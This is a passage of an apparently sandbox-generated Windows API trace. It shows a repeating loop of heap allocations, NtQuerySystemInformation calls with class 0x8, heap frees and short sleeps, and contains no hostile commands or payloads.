dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0293.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0293.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0293.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.692] Sleep (dwMilliseconds=0x110) [0293.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0293.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0293.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0293.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0293.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0293.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0293.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0293.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0293.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.703] Sleep (dwMilliseconds=0x110) [0293.730] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0293.730] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.730] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0293.730] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0293.730] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.731] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0293.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0293.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0293.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0293.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0293.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.734] Sleep (dwMilliseconds=0x110) [0293.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0293.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0293.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0293.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0293.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0293.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0293.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0293.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0293.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.751] Sleep (dwMilliseconds=0x110) [0293.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0293.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0293.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0293.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0293.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0293.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0293.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0293.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0293.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.769] Sleep (dwMilliseconds=0x110) [0293.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0293.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0293.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0293.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0293.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0293.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0293.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0293.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0293.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.784] Sleep (dwMilliseconds=0x110) [0293.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0293.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0293.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0293.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0293.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0293.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0293.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0293.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0293.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.802] Sleep (dwMilliseconds=0x110) [0293.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0293.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0293.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0293.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0293.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0293.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0293.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0293.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0293.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.815] Sleep (dwMilliseconds=0x110) [0293.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0293.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0293.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0293.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0293.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0293.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0293.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0293.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0293.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.832] Sleep (dwMilliseconds=0x110) [0293.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0293.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0293.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0293.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0293.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0293.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0293.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0293.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0293.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.848] Sleep (dwMilliseconds=0x110) [0293.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0293.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0293.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0293.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0293.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0293.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0293.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0293.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0293.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.863] Sleep (dwMilliseconds=0x110) [0293.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0293.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0293.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0293.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0293.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0293.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0293.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0293.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0293.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.877] Sleep (dwMilliseconds=0x110) [0293.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0293.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0293.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0293.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0293.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0293.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0293.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0293.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0293.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.890] Sleep (dwMilliseconds=0x110) [0293.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0293.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0293.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0293.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0293.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0293.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0293.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0293.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0293.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.910] Sleep (dwMilliseconds=0x110) [0293.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0293.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0293.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0293.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0293.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0293.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, 